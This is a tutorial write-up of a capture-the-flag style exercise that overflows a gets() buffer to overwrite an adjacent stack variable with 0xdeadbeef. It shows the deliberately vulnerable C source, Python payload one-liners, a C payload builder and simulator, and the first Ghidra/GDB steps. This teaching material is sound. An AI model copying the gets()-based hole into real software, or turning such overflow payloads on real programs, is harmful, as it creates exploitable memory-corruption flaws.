🫁02-overwriting_stack_variables_part2

So let's run the binary and try out the overflow.

Let's unhex the printed value to understand what happened.

Let's look at the source code to see what happened:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void do_input(){
    int key = 0x12345678;
    char buffer[32];
    printf("yes? ");
    fflush(stdout);
    gets(buffer);
    if(key == 0xdeadbeef){
        printf("good job!!\n");
        printf("%04x\n", key);
        fflush(stdout);
    }
    else{
        printf("%04x\n", key);
        printf("...\n");
        fflush(stdout);
    }
}

int main(int argc, char* argv[]){
    do_input();
    return 0;
}

We see a 32-byte buffer, and the key has to equal 0xdeadbeef, but there is no input path that changes key: it is only ever set to 0x12345678. The only way to change it is to overwrite it, and gets() lets us do exactly that, because it reads until a newline with no length check, so anything past 32 bytes spills out of buffer into whatever sits after it on the stack.

python2 -c 'print 32 * "A" + "deadbeef"'

So I tried overflowing the 32-byte buffer with the string deadbeef, but key only took the first 4 characters (key is a 4-byte int), and the printed value shows them reversed: the bytes 'd','e','a','d' (64 65 61 64) are read back as the little-endian integer 0x64616564, which unhexes to "daed".

Reversing the characters ("daed") does not help either, because the comparison is against the integer 0xdeadbeef, not against the text "deadbeef". What has to land in key is the raw bytes of that integer in the order x86 stores them in memory, least-significant byte first:

OK, now comes the tricky part: we craft the payload with those raw bytes and feed it to the overwrite binary:

python2 -c 'print 32 * "A" + "\xef\xbe\xad\xde"'
python2 -c 'print 32 * "A" + "\xef\xbe\xad\xde"' > payload
./overwrite < payload

"\xef\xbe\xad\xde":

  • This is a string of four specific byte values written in hexadecimal notation. Each \xHH escape produces a single byte whose value is HH.

  • Here "\xef\xbe\xad\xde" produces the bytes EF, BE, AD and DE.

These four bytes are non-printable, which is why they have to be written as escapes instead of typed directly (and why Python 2 is used here: its print writes str bytes as-is, whereas Python 3's print would encode them as UTF-8 and corrupt the payload).

Because x86 is little-endian, the CPU reads the bytes EF BE AD DE at key's address as the integer 0xdeadbeef, so the comparison succeeds and the challenge is validated.
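To make the byte-order point concrete, here is an added example (not part of the original writeup or the challenge code) that models do_input's frame as the writeup observes it: a 32-byte buffer immediately followed by the 4-byte key. That adjacency is an assumption about this particular build; another compiler or optimisation level may leave padding between the two, which would change the offset. The program packs a target value into little-endian bytes, simulates the overflow with memcpy, and reproduces both the failed ASCII attempt and the working payload, then writes the working payload to a file called payload (assumed name) for piping into the binary.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed model of do_input's stack frame: buffer[32] directly followed
 * by key. Not taken from the binary; the real distance can differ. */
struct frame {
    char buffer[32];
    uint32_t key;
};

#define BUF_SIZE 32
#define PAYLOAD_SIZE (BUF_SIZE + sizeof(uint32_t))

/* Write value into out[] least-significant byte first, the way an x86
 * int is laid out in memory. For 0xdeadbeef this yields EF BE AD DE. */
void pack_le32(uint32_t value, unsigned char out[4]) {
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)(value >> (8 * i));
}

/* Read four bytes back as a little-endian integer: what the CPU does when
 * it loads key after the overwrite. */
uint32_t unpack_le32(const unsigned char in[4]) {
    uint32_t v = 0;
    for (int i = 0; i < 4; i++)
        v |= (uint32_t)in[i] << (8 * i);
    return v;
}

/* Build the 36-byte payload: BUF_SIZE filler bytes, then target as
 * little-endian bytes. Returns the number of bytes written. */
size_t build_payload(uint32_t target, unsigned char *out) {
    memset(out, 'A', BUF_SIZE);
    pack_le32(target, out + BUF_SIZE);
    return PAYLOAD_SIZE;
}

/* Simulate the overflow: copy len bytes of input starting at buffer, as
 * gets() would, and return whatever key holds afterwards. The copy is
 * capped at the size of the model frame so the simulation itself stays
 * in bounds. */
uint32_t key_after_overflow(const unsigned char *input, size_t len) {
    struct frame f;
    f.key = 0x12345678;
    if (len > sizeof f)
        len = sizeof f;
    memcpy(&f, input, len);
    return f.key;
}

int main(void) {
    unsigned char payload[PAYLOAD_SIZE];
    build_payload(0xdeadbeef, payload);
    printf("key after byte payload : %08x\n",
           key_after_overflow(payload, PAYLOAD_SIZE));

    /* Reproduce the first attempt: ASCII "deadbeef" after the filler.
     * Only "dead" reaches key, read as 0x64616564. */
    unsigned char ascii[BUF_SIZE + 8];
    memset(ascii, 'A', BUF_SIZE);
    memcpy(ascii + BUF_SIZE, "deadbeef", 8);
    printf("key after ASCII payload: %08x\n",
           key_after_overflow(ascii, sizeof ascii));

    /* Write the working payload so it can be fed to the challenge with
     * ./overwrite < payload */
    FILE *fp = fopen("payload", "wb");
    if (fp) {
        fwrite(payload, 1, PAYLOAD_SIZE, fp);
        fclose(fp);
    }
    return 0;
}
```

The same pack_le32 routine generalises to any target value, so the payload builder can be reused for other "set this variable" challenges; the only thing that changes per binary is the offset between the buffer and the variable, which should be confirmed in the disassembly rather than assumed.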

Now let's open up Ghidra.

We can start by renaming some of the variables so the decompilation looks more like our C program:

And just like that we see the comparison being made. Now let's hop into GDB.

Let's start with info functions:

We then disassemble main:

We see the call to do_input, which looks interesting, so let's disassemble it too:
